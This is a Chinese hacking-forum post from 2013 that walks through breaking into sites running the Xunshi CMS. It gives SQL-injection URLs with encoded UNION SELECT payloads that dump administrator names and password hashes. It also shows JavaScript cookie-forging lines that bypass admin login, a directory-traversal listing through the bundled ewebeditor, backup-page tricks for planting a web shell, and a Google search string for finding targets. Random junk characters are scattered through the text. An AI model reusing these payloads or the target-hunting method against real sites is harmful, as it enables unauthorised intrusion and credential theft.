找回密码
 立即注册
查看: 3504|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘! T" a; W! N9 G  _3 |( W7 w

1 r8 l% E! ]0 L! `+ q( l在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
8 X# b2 \7 Y8 N7 i2 ^: Y+ ~( Z; Z, w! h2 \. W
以下本文总结来自黑防去年第9期杂志上的内容...
/ |3 |( l" H( c& y/ f
% v, q- s( ^# K先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
, d6 q8 \6 E; `# s) a0 E& Y2 Y4 ~. G  a9 y8 u) N
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
6 x; g( c8 O- ^0 o' v# P5 X, q0 U$ s0 A8 l7 s- G: Y3 Q9 L
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况6 a, {) l# x5 m5 ^  W/ R
这里一个注入: J3 G  P) V* p# `! d. M6 P

7 Z* D# d& W4 T. N7 \$ ]效果如图:
% g' }1 @3 Z# H2 u
3 n3 ?- D1 C% q3 x$ x2 _ ) g4 Q9 z# y# H8 O

8 @& m5 j. {# v- |1 U# k1 A0 R这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.2 @; c! N% M8 ?8 R' @' _& p% G
+ _" {, ~# B! I
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去  m- t' o2 q- S
* W1 C# h0 ]4 Z# Y) `
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));, H3 F+ B1 q; z$ F9 b
  X* _* F. _8 }; G- c
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:4 {3 N. {3 ^' N4 _

, v1 M- @+ n( O4 r4 v因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞3 U6 T4 O2 i% v# M7 m) o' P/ {/ n" n" X
: G: y* X/ }2 s) F* m
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以7 U) n2 G$ e8 r3 b

, }+ `% X1 d0 a& e8 _$ T访问这页面来列目录..步骤如下:( ]" c& h4 q# W( [$ F1 S
/ r! {- s  O/ f) Q# m: W
javascript:alert(document.cookie="admindj=1") / Q; ?2 f/ I7 \3 Q

! n9 z2 Q/ C7 ]/ u: nhttp://www.political-security.co ... asp?id=46&dir=../..! X" A. T- v* X/ b5 ~
3 h1 X8 L' y4 N( W
效果如图:3 f( Y7 Z, s2 h" }: \4 o

1 W+ u$ c0 s8 E( X5 N! } + g: W5 p2 P4 c# s7 |; w! k9 o  X
- d& H, x8 F1 ]3 C5 @& S9 ]' W) Q
这样全站目录都能瞧了..找到后台目录..进去..' ~' q1 w9 B$ ]
( o* J5 `" W0 L6 j: q1 p& |
那么进了后台怎么拿shell??上传--备份就ok了..
% F* k* y' P! z( r1 _) L$ I9 [. q( ?; w" y+ f; G
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
, o1 N1 M9 `1 d
# l' ~5 ~! n$ [1 `9 y这个我也碰到过一次..你都可以通过列目录来实现..* w4 z7 p% F( a/ X! e# h& H3 ]) c7 P

  v6 f' k0 `* V4 p& [  Njavascript:alert(document.cookie="admindj=1") - c% w; Y. q8 M' B

4 c' ]1 j; C! l; K$ V$ O% W* U( Qhttp://www.political-security.co ... p?action=BackupData
) _7 P$ v) [( D8 P% I3 k$ |& a5 M5 X
备份ok..
& g+ _3 M. `1 U3 u. s2 M  Q# `2 u' f3 f
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
- u/ e# n; E3 e" I
& K, h( B: A" K5 C在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
2 f7 R9 @1 C" g- O7 ~) D  R7 l' z# o2 Q3 C( H, |
然后访问此页面进行注入..步骤如下:4 \# c* n% X5 K' ?, N
5 l7 o. O# \. _8 W$ \5 ?
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
: F) R$ t* u( T2 f6 f" f0 W, R' d' ]# p9 j; e
然后请求admin/admin_chk.asp页面$ k, `' ^8 m! f, R% p
( H7 `3 \; a; v5 A$ s: c
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
0 h: j0 H: j# K5 `2 A) S7 o+ ~/ p) E5 W, g0 E
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin; P$ N6 _) u3 m  |  p/ C

% _* b6 j. [9 p/ u" m, u- g" S7 S0 _效果如图所示:+ D4 b$ H" f/ A0 {  l
1 z) P+ P- p: ?; O6 j/ l& t. ^! _

3 B( y: e4 d: m. s9 Z9 W6 T1 e  L2 B& R2 T5 K% ]+ M- z
讯时漏洞2
9 Q- W# ?/ z4 n$ O9 G( F% hgoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧). M1 A' B. }: T; C
& C: j* p1 J* ?/ b: o3 b" ?
1、/admin/admin_news_pl_view.asp?id=15 i: i$ B% J% v  p# ?& C
//id任意 填入以下语句0 p6 f0 C6 p, Z0 f: S0 E4 l

- U& d4 C: x7 Y# n/ [. d2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!& Y, Q4 @! k- O
% H+ t7 Q, O  z( t

) X' N2 o6 r& y* X8 H- m
+ I$ {8 M7 \- g0 q! g3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
* _0 l/ |6 p/ l/ s  f6 Z/ m ) S% r2 f# Q% m, c5 t# r

4 E& ^. }2 d1 }7 ^6 U# k' J/ j/ w; y" B% i
爆出管理员帐号和密码了
' W( e9 D; B7 B$ V! p - ~( ^( [0 J/ X3 t* r

& P% H2 a* u6 ?! {8 ]
3 k/ _- b% i; B4、cookies进后台
+ d6 Q4 v( j1 ?1 s
3 Y# v* }8 u5 H) R* {javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));! \2 ~" y9 Y$ D% w
9 c5 m6 E6 @8 ?! d
9 C6 ]  ^( a: S( a8 k. ?

. `% D: q* u% \4 w: D5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!9 E) w) w+ H* Z) h

7 |! o/ F8 ~- {9 u2 Q
* q' {! [5 ?4 p6 {3 N" i5 L3 n# [. S) R% Z; _7 n
6、后台有上传和备份取SHELL不难。# O; O, @: Y( t
/ \5 X  q% I% ~- ?
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..* S7 g) K9 u/ W) s* m3 v

( A6 b7 a6 i5 c1 }. f逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!8 ?  z: y0 K$ ~# l: b$ _; m

* a! O$ y8 t* D% f" D" _+ r7 x( o
' z) o; b# F0 C4 u& E* f
% A% w6 q. f: K  v% Z5 b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表